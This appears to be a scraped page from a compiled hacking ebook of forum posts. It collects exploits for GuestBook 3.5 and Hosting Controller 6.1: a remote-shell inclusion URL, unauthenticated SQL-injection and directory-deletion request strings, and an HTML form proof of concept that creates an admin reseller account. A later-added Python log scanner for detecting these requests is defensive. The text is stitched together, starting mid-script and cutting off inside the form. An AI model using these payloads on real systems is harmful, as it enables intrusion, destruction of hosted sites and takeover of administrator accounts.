
Hacker Professional Ebook part 377 pptx


echo "Exploit failed \r\n";

?>

micimacko(HCE)

GuestBook 3.5 Remote Command Execution

Xploit:

Code:

http://www.site.com/[scriptpath]/index.php?GB_PATH=http://con shell

black_hat_cr(HCE)

Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln

Quote:

Hosting Controller 6.1 Hotfix <= 3.2 Multi Vuln

SQL_Injection, Command Injection

-

[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2

Vendor: Hosting Controller

Vendor URL: www.hostingcontroller.com

Solution: Hotfix 3.3

Found Date: 7/1/2006

Release Date: 10/10/2006

Discussion:


-

UnAuthenticated user can

1- delete every sites virtual directory on hc sites

2- make forum virtual directory (with the desire name) for everysites on hc!

3- disable all hc forums by SQL Injection

4- enable all hc forums by SQL Injection

Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory

Exploit: (or POC)

-

1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!

/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1

-

2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!

/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=

-

3- unAuthenticated user can disable all hc forums by SQL_Injection

/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 -

4- unAuthenticated user can enable all hc forums by SQL_Injection

/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 -

Credit :

-

Soroush Dalili of Kapda and GSG

IRSDL [4t} kapda <d0t] ir

Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]


GSG - Grayhatz security group [http://www.Grayhatz.net]

-

By Pi3cH On 16 Oct 2006

Navaro(HCE)
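
For operators of installations that predate Hotfix 3.3, the following added example (not part of the original posts or of the KAPDA advisory) reviews web server logs for requests to the two forum scripts named above. It assumes IIS W3C extended logs with a `#Fields:` header; the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import parse_qs

# Endpoints named in the advisory (compared case-insensitively, as IIS does).
TARGETS = {
    "/forum/hcspecific/disableforum.asp",
    "/forum/hcspecific/enableforum.asp",
}

def scan(lines):
    """Return (client_ip, uri_stem, reason) for each request worth reviewing."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows below
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        if stem.lower() not in TARGETS:
            continue
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        params = {k.lower(): v for k, v in query.items()}
        forum_ids = params.get("forumid", [])
        # ForumID should be an integer; anything else suggests SQL injection.
        if any(not re.fullmatch(r"\d*", v.strip()) for v in forum_ids):
            reason = "non-numeric ForumID"
        else:
            # The advisory says these scripts ran without authentication,
            # so every call should be matched to a known admin action.
            reason = "forum state change, verify caller"
        hits.append((row.get("c-ip", "?"), stem, reason))
    return hits

# Constructed sample log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2006-10-16 09:12:01 GET /forum/default.asp - 192.0.2.10 200
2006-10-16 09:12:07 GET /forum/HCSpecific/DisableForum.asp action=disableforum&ForumID=1+or+1=1 198.51.100.7 200
2006-10-16 09:13:40 GET /forum/HCSpecific/EnableForum.asp action=enableforum&WSiteName=example.test&VDirName=test&ForumID=4 203.0.113.5 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, reason in scan(SAMPLE_LOG):
        print(f"{ip:15} {stem:40} {reason}")
```
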

Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability

Title: An attacker can gain reseller privileges and after that can gain admin privileges

Version: 6.1 Hotfix <= 3.1

Developer url: www.Hostingcontroller.com

Solution: Update to Hotfix 3.2

Discover date: 2005,Summer

Report date (to hc company): Sat Jun 10, 2006

Publish date (in security forums): Thu July 06, 2006

-

===============================================

1- This code gives resadmin session to a user:

Bug in "hosting/addreseller.asp", No checker is available

-

<script>

function siteaction(){

n_act= "/hosting/addreseller.asp?htype=3"

window.document.all.frm1.action = window.document.all.siteact.value + n_act

window.document.all.frm1.submit()

}

</script>

<hr><br>


Form1<br>

URL: <input type="text" name=siteact size=70>

<br>

<form name="frm1" method="post" onsubmit="return siteaction()">

<table>

<tr>

<td>reseller</td>

<td><input type="text" name="reseller" value="hcadmin"></td>

</tr>

<tr>

<td>loginname</td>

<td><input type="text" name="loginname" value="hcadmin"></td>

</tr>

<tr>

<td>Password</td>

<td><input type="text" name="Password" value=""></td>

</tr>

<tr>

<td>first_name</td>

<td><input type="text" name="first_name" value=""></td>

</tr>

<tr>

<td>first_name</td>

<td><input type="text" name="first_name" value=""></td>

</tr>

<tr>

<td>last_name</td>

<td><input type="text" name="last_name" value=""></td>

</tr>

<tr>

<td>address</td>

<td><input type="text" name="address" value=""></td>

</tr>

<tr>

<td>city</td>


<td><input type="text" name="city" value=""></td>

</tr>

<tr>

<td>state</td>

<td><input type="text" name="state" value=""></td>

</tr>

<tr>

<td>country</td>

<td><input type="text" name="country" value=""></td>

</tr>

<tr>

<td>email</td>

<td><input type="text" name="email" value=""></td>

</tr>

<tr>

<td>phone</td>

<td><input type="text" name="phone" value=""></td>

</tr>

<tr>

<td>fax</td>

<td><input type="text" name="fax" value=""></td>

</tr>

<tr>

<td>zip</td>

<td><input type="text" name="zip" value=""></td>

</tr>

<tr>

<td>selMonth</td>

<td><input type="text" name="selMonth" value=""></td>

</tr>

<tr>

<td>selYear</td>

<td><input type="text" name="selYear" value=""></td>

</tr>


<tr>

Posted: 04/07/2014, 12:20
